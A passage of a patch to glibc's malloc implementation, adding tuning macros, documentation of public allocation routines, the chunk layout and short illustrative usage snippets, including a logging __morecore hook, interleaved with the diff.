+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
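
The run-time counterpart of the MXFAST remark above is mallopt: setting
M_MXFAST to 0 disables fastbin caching entirely. A minimal sketch, assuming
<malloc.h> is available:

#include <malloc.h>
#include <stdlib.h>

int main(void)
{
  /* With M_MXFAST set to 0, small freed chunks are no longer cached in
     fastbins, trading speed for a smaller footprint (see the
     TRIM_FASTBINS discussion above).  */
  mallopt(M_MXFAST, 0);

  void *p = malloc(24);
  free(p);   /* no longer parked in a fastbin */
  return 0;
}
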
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
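
In this glibc release __morecore is still a public hook, so MORECORE can be
redirected without rebuilding the allocator. A hedged sketch of a pass-through
hook that only logs heap growth (the logging and the hook assignment are
illustrative; __morecore and __default_morecore are declared in <malloc.h>):

#include <malloc.h>
#include <stddef.h>
#include <stdlib.h>
#include <unistd.h>

static void *logging_morecore(ptrdiff_t increment)
{
  /* Keep the hook allocation-free: raw write(2) instead of stdio.  */
  write(2, "morecore called\n", 16);
  return __default_morecore(increment);
}

int main(void)
{
  __morecore = logging_morecore;   /* consulted whenever the heap must grow */
  free(malloc(1));                 /* may trigger MORECORE if the heap is new */
  return 0;
}
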
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on the system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
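+
+/*
+  Illustrative caller-side sketch (variable names are arbitrary); a
+  request of 0 still yields a valid, minimum-sized chunk:
+
+  void *p = malloc (n);
+  if (p == NULL)
+    perror ("malloc");
+*/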
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will,
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always
+  be reallocated using malloc-copy-free sequences unless
+  the system supports MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
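+
+/*
+  Illustrative caller-side sketch: because p is NOT freed on failure,
+  keep the old pointer until the call succeeds (handle_oom stands in
+  for whatever error handling the caller uses):
+
+  void *tmp = realloc (p, n);
+  if (tmp != NULL)
+    p = tmp;
+  else
+    handle_oom (p);
+
+  On success the block may have moved; on failure p is still valid
+  and still owned by the caller.
+*/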
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
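+
+/*
+  Illustrative sketch using the parameters listed above, e.g. to
+  disable fastbins and raise the trim threshold to 256K:
+
+  mallopt (M_MXFAST, 0);
+  mallopt (M_TRIM_THRESHOLD, 256 * 1024);
+
+  Each call returns 1 if the parameter was accepted, 0 otherwise.
+*/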
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   the maximum total allocated space. This will be greater
+		than current total if trimming has occurred.
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
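+
+/*
+  Illustrative sketch printing a few of the fields described above
+  (all fields are plain ints):
+
+  struct mallinfo mi = mallinfo ();
+  printf ("arena=%d uordblks=%d fordblks=%d\n",
+          mi.arena, mi.uordblks, mi.fordblks);
+*/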
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  rounds n up to the nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
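+
+/*
+  Illustrative sketch: posix_memalign reports errors through its
+  return value (0 on success, EINVAL or ENOMEM otherwise), and the
+  alignment must be a power of two multiple of sizeof (void *):
+
+  void *p;
+  if (posix_memalign (&p, 64, 1024) == 0)
+    free (p);
+*/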
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
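+
+/* For illustration: with SIZE_SZ == 4 (a typical 32-bit build)
+   DEFAULT_MXFAST is 64 * 4 / 4 = 64 bytes of request size; with
+   SIZE_SZ == 8 (a typical 64-bit build) it is 64 * 8 / 4 = 128.  */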
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than the page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+#ifndef NO_THREADS
+static void*   malloc_atfork(size_t sz, const void *caller);
+static void      free_atfork(void* mem, const void *caller);
+#endif
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if allocated            | |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                       |M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk                                     |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk                            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                         |P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The two exceptions to all this are
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size field.
+
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
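+
+/* For illustration: with SIZE_SZ == 8 (a typical 64-bit build) the
+   user pointer lies 2 * 8 = 16 bytes past the chunk header, so
+   mem2chunk (mem) == (mchunkptr) ((char *) mem - 0x10) and the two
+   macros are exact inverses.  */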
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
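+
+/* For illustration: on a typical 64-bit build (SIZE_SZ == 8,
+   MALLOC_ALIGNMENT == 16), MIN_CHUNK_SIZE is the offset of
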